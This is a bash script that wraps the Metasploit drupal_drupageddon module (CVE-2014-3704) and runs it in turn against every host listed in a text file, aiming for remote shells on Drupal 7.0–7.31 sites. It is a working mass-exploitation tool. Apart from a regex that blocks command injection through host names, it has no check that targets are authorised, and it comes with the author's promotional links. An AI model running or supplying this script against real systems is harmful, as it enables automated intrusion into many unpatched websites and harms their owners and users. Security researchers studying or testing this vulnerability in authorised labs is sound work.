MINI-EXPLOIT // Drupal HTTP Parameter Key/Value SQL Injection
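#!/bin/bash
#
# MINI-EXPLOIT // Metasploit->Drupal HTTP Parameter Key/Value SQL Injection
#
# Wrapper that runs the Metasploit module drupal_drupageddon once per host
# listed in a text file.
#
# Module description (from the upstream module):
#   This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
#   (aka Drupageddon) in order to achieve a remote shell on the vulnerable
#   instance. This module was tested against Drupal 7.0 and 7.31
#   (was fixed in 7.32).
#
# Affected: Drupal 7.0 - 7.31
# -----------------------------------------------------------------------
# SCRIPT AUTHOR / OPTIMIZER:
# Cleiton Pinheiro / Nick: googleINURL
# [+] EMAIL:    inurlbr@gmail.com
# [+] Blog:     http://blog.inurl.com.br
# [+] Twitter:  https://twitter.com/googleinurl
# [+] Fanpage:  https://fb.com/InurlBrasil
# [+] Pastebin  http://pastebin.com/u/Googleinurl
# [+] GIT:      https://github.com/googleinurl
# [+] PSS:      http://packetstormsecurity.com/user/googleinurl
# [+] EXA:      http://exploit4arab.net/author/248/Cleiton_Pinheiro
# [+] YOUTUBE:  http://youtube.com/c/INURLBrasil
# [+] PLUS:     http://google.com/+INURLBrasil
# -----------------------------------------------------------------------
# Use:
#   ./Drupal7.0-7.31.sh hosts.txt
#
# CVE-2014-3704
# SOURCE MODULE:
# http://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon
# URL: https://www.drupal.org/SA-CORE-2014-005
# URL: http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

readonly EXPLOIT_MODULE='exploit/multi/http/drupal_drupageddon'

#######################################
# Check that a host entry is safe to place into the msfconsole command string.
# Only hostname / IPv4 / IPv6 characters are accepted, so an entry containing
# ';', whitespace or quotes cannot append extra console commands.
# Arguments: $1 - candidate host entry
# Returns:   0 if the entry is acceptable, 1 otherwise
#######################################
is_valid_target() {
  [[ "$1" =~ ^[A-Za-z0-9:][A-Za-z0-9._:-]*$ ]]
}

#######################################
# Read the host list and run the module against each entry in turn.
# Globals:   EXPLOIT_MODULE (read)
# Arguments: $1 - path to a text file of hosts (whitespace/newline separated)
# Outputs:   progress banners on stdout, diagnostics on stderr
# Returns:   2 if the host file is missing or unreadable, 0 otherwise
#######################################
main() {
  local filename=${1:-}
  local raw target
  local -a words

  echo "[+] MINI-EXPLOIT / Metasploit->(Drupal HTTP Parameter Key/Value SQL Injection) - INURL BRASIL"

  if [[ -z "$filename" || ! -f "$filename" || ! -r "$filename" ]]; then
    printf 'Usage: %s hosts.txt\n' "${0##*/}" >&2
    return 2
  fi

  echo "[+] [ START PROCESS ]"
  echo "[+] [EXPLOIT] ${EXPLOIT_MODULE}"

  # The list is read on fd 3 so that msfconsole keeps the terminal on stdin.
  while IFS= read -r -u 3 raw || [[ -n "$raw" ]]; do
    raw=${raw%$'\r'}              # tolerate CRLF host files
    read -r -a words <<<"$raw"    # split on whitespace without glob expansion
    for target in "${words[@]}"; do
      if ! is_valid_target "$target"; then
        printf '[!] [ SKIP ] invalid host entry: %s\n' "$target" >&2
        continue
      fi
      echo "----------------------------------------------------------------------------------"
      echo "=================================================================================="
      echo "----------------------------------------------------------------------------------"
      printf '%s\n' "[+] [ TARGET ]  ${target}"
      echo "[!] [ exec ] metasploit..."
      # target was validated above; it is the only variable part of the -x string.
      msfconsole -x "use ${EXPLOIT_MODULE};set RHOST ${target};exploit;exit;"
    done
  done 3<"$filename"
}

main "$@"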